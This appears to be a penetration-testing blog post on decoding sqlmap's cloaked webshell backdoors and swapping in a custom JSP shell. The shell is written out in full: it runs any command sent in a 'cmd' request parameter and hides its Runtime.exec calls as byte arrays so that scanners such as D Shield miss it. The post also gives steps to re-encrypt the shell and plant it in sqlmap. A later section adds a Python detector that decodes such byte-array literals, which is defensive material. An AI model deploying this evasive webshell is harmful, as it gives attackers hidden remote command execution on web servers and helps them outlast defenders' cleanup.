sqlmap OS shell internals and swapping in a custom AV-evading shell


Today, while slacking off at work, I happened to come across an article about sqlmap's OS shell feature. It describes the OS shell process in detail, but the author gave up at the point of actually implementing a custom shell.

Hence this article.
As that author said, this is indeed a bit superfluous. It is not useless, though: if the other side's network administrator notices abnormal traffic, they may quickly upload a scanning tool to remove the webshell from the site. Having an AV-evading shell in place at that point may buy valuable time for the penetration test.


Although sqlmap stores its shells in a cloaked binary form, they have to be decoded when OS shell is used. sqlmap first loads the cloaked shell, decodes it, and then writes out the resulting file.
The sqlmap shells live in data\shell\backdoors\

First, search the sqlmap source tree for the code that handles the backdoor***_ files.

The decoding logic is located in lib\core\common.py

You can see that decloakToTemp receives a filename parameter and calls the decloak function to decode it. Judging by the name of the returned variable, the return value is the decoded content of the file, and the docstring gives a detailed example of how to call it.
From the import statement, decloak comes from the extra.cloak.cloak package.

In extra\cloak\cloak.py we find the actual encryption and decryption functions.

The decryption process is roughly: XOR the data with the defined KEY via the xor function, then decompress it with zlib.decompress.
The main function also shows how to use the script from the command line (really convenient).

With the decryption script in hand, we pass in the parameters in the format it expects:

Parameter   Meaning
-i          input file
-o          output file
-d          decrypt (omit this flag to encrypt)

Here I use jsp as the example; the process for the other formats is the same.

After running it, open backdoor.jsp and you can see the source code.
Original format

After decoding

From the source code it is clear that this is a cmd-style webshell. Next, we can replace the code that actually executes the cmd command with our AV-evading code or other functionality. Here I replace it with a reflection-based cmd shell:

```jsp
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.util.Scanner" %>
<%
// Same "cmd" request parameter as the stock sqlmap backdoor, so OS shell keeps working.
if (request.getParameter("cmd") != null) {
    String str = request.getParameter("cmd");
    // Class and method names are assembled from byte arrays instead of plain string
    // literals; this is the only thing that differs from the original shell.
    String rt = new String(new byte[]{106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101});
    Class<?> c = Class.forName(rt);
    Method m1 = c.getMethod(new String(new byte[]{103, 101, 116, 82, 117, 110, 116, 105, 109, 101}));
    Method m2 = c.getMethod(new String(new byte[]{101, 120, 101, 99}), String.class);

    Object obj2 = m2.invoke(m1.invoke(null, new Object[]{}), new Object[]{str});

    Method m = obj2.getClass().getMethod(new String(new byte[]{103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109}));

    Scanner s = new Scanner((InputStream) m.invoke(obj2, new Object[]{})).useDelimiter("\\A");
    String result = s.hasNext() ? s.next() : "";
    out.print(result);
}
%>
```

Note: for sqlmap's OS shell feature to work normally, the replacement shell must accept exactly the same parameters as the original.
After the replacement, use the cloak script again to encrypt the source file.

This produces backdoor_diy.jsp_. After encrypting the file, copy it into sqlmap's shell directory (remember to rename it to backdoor.jsp_).
Finally, set up a local Java injection environment for testing.

Test with OS shell

Everything works. Confirm that the uploaded tmpbqlnx.jsp is our modified shell.

No problem. Finally, drop it into D盾 (D Shield) to test.
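The byte-array trick in the shell above only hides strings from a literal grep; a scanner that decodes the literals sees them plainly. The following Python check (an added example, not code from the original post, from sqlmap or from D盾) pulls every `new String(new byte[]{...})` literal out of a JSP, decodes it, and flags the file when the recovered names combined with `Class.forName`/`invoke` indicate reflective command execution. The sample inputs are constructed to mirror the snippet above.

```python
import re
from typing import Dict, List

# Java literals of the form  new String(new byte[]{106, 97, ...})
BYTE_ARRAY_RE = re.compile(
    r"new\s+String\s*\(\s*new\s+byte\s*\[\s*\]\s*\{([^}]*)\}\s*\)")

# Decoded strings that indicate command execution via reflection.
EXEC_MARKERS = {"java.lang.Runtime", "getRuntime", "exec",
                "java.lang.ProcessBuilder"}


def decode_byte_arrays(source: str) -> List[str]:
    """Return the strings hidden inside byte-array String literals."""
    found = []
    for match in BYTE_ARRAY_RE.finditer(source):
        values = [int(v.strip(), 0)
                  for v in match.group(1).split(",") if v.strip()]
        # Java bytes are signed: mask to 0..255 before decoding.
        found.append(bytes(v & 0xFF for v in values).decode("latin-1"))
    return found


def scan_jsp(source: str) -> Dict[str, object]:
    """Flag a JSP that builds Runtime/exec names from bytes and invokes them."""
    decoded = decode_byte_arrays(source)
    hits = sorted(s for s in decoded if s in EXEC_MARKERS)
    reflective = "Class.forName" in source and ".invoke(" in source
    return {"decoded": decoded, "hits": hits,
            "reflective": reflective, "verdict": bool(hits) and reflective}


# Constructed sample mirroring the reflective shell shown above (not a real upload).
SAMPLE_JSP = """
String rt = new String(new byte[]{106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101});
Class<?> c = Class.forName(rt);
Method m1 = c.getMethod(new String(new byte[]{103, 101, 116, 82, 117, 110, 116, 105, 109, 101}));
Method m2 = c.getMethod(new String(new byte[]{101, 120, 101, 99}), String.class);
Object p = m2.invoke(m1.invoke(null, new Object[]{}), new Object[]{str});
Method m = p.getClass().getMethod(new String(new byte[]{103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109}));
"""

# Constructed benign page: a byte-array literal with no exec semantics.
BENIGN_JSP = 'String greet = new String(new byte[]{104, 105});\nout.print(greet);'

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_JSP), ("benign", BENIGN_JSP)):
        print(name, scan_jsp(src))
```

The check is deliberately narrow; a production scanner would also normalise other string-construction tricks (char arrays, concatenation, Base64) before matching.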

The source code will be published on GitHub later.

References

Exploration of sqlmap OS shell


This article is shared from the WeChat official account Black Umbrella Attack and Defense Laboratory (hack_umbrella).


Posted by wilded1 on Wed, 04 May 2022 04:09:00 +0300